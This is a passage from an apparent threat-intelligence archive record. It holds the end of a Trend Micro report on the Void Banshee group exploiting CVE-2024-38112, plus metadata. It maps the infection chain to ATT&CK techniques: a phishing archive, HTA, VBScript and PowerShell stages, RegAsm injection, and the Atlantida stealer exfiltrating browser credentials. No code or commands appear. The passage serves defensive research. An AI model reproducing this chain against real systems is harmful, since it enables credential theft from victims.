techniques\r\nTactic | Technique | Context\r\nInitial Access | T1566.002 - Phishing: Spearphishing Link | Victim downloads malicious zip archive\r\nExecution | T1204.002 - User Execution: Malicious File | Victim executes Internet Shortcut (.URL) file that exploits CVE-2024-38112\r\nDefense Evasion | T1218 - System Binary Proxy Execution | MHTML \u0026 x-usc directive handler opens compromised site in Internet Explorer\r\nResource Development | T1584.004 - Compromise Infrastructure: Server | Victim is redirected to compromised site which downloads a malicious HTML Application (.HTA)\r\nExecution | T1204.002 - User Execution: Malicious File | Victim opens HTA file\r\nExecution | T1059.005 - Command and Scripting Interpreter: Visual Basic | HTA application executes VBScript\r\nDefense Evasion | T1027 - Obfuscated Files or Information | Obfuscated VBScript\r\nResource Development | T1584.004 - Compromise Infrastructure: Server | VBScript downloads malicious PowerShell script\r\nExecution | T1059.001 - Command and Scripting Interpreter: PowerShell | PowerShell script executes\r\nResource Development | T1584.004 - Compromise Infrastructure: Server | PowerShell script downloads malicious .NET loader\r\nDefense Evasion | T1027 - Obfuscated Files or Information | Obfuscated .NET loader\r\nDefense Evasion | T1055 - Process Injection | The .NET loader injects the decrypted payload into RegAsm.exe\r\nDefense Evasion | T1218.009 - System Binary Proxy Execution: Regsvcs/Regasm | Atlantida abuses RegAsm.exe to proxy malicious code execution\r\nCollection | T1560.001 - Archive Collected Data: Archive via Utility | Atlantida compresses the stolen data into a ZIP archive for exfiltration\r\nCollection | T1005 - Data from Local System | Atlantida collects sensitive local system information\r\nDiscovery | T1082 - System Information Discovery | Atlantida collects hardware information from the victim\r\nCredential Access | T1555.003 - Credentials from Password Stores: Credentials from Web Browsers | Atlantida collects sensitive data from web browsers, including Chrome extension data\r\nCollection | T1113 - Screen Capture | Atlantida captures screenshots of the victim machine\r\nExfiltration | T1041 - Exfiltration Over C2 Channel | Void Banshee exfiltrates stolen data to the C\u0026C server\r\nIndicators of Compromise (IOCs)\r\nThe full list of IOCs is available for download from the original blog entry.\r\nAcknowledgments\r\nThe Zero Day Initiative would like to thank the following Trenders for their contributions in ensuring that Trend Micro customers were protected from this zero-day attack before the patch was available: Scott Graham, Mohamad Mokbel, Abdelrahman Esmail, Simon Dulude, Senthil Nathan Sankar, and Amit Kumar, with special thanks to the content writers and marketing teams for helping with this research.\r\nSource: https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html",
	"extraction_quality": 1,
	"language": "EN",
	"sources": [
		"MISPGALAXY",
		"Malpedia"
	],
	"references": [
		"https://www.trendmicro.com/en_us/research/24/g/CVE-2024-38112-void-banshee.html"
	],
	"report_names": [
		"CVE-2024-38112-void-banshee.html"
	],
	"threat_actors": [
		{
			"id": "d4f47608-d167-41e7-946a-316b757a68a4",
			"created_at": "2024-07-17T02:00:04.175014Z",
			"updated_at": "2026-04-10T02:00:03.672173Z",
			"deleted_at": null,
			"main_name": "Void Banshee",
			"aliases": [],
			"source_name": "MISPGALAXY:Void Banshee",
			"tools": [],
			"source_id": "MISPGALAXY",
			"reports": null
		}
	],
	"ts_created_at": 1775434893,
	"ts_updated_at": 1775791473,
	"ts_creation_date": 0,
	"ts_modification_date": 0,
	"files": {
		"pdf": "https://archive.orkl.eu/2c05ab898e557bfc8ccbd814babf8255ec0fffcc.pdf",
		"text": "https://archive.orkl.eu/2c05ab898e557bfc8ccbd814babf8255ec0fffcc.txt",
		"img": "https://archive.orkl.eu/2c05ab898e557bfc8ccbd814babf8255ec0fffcc.jpg"
	}
}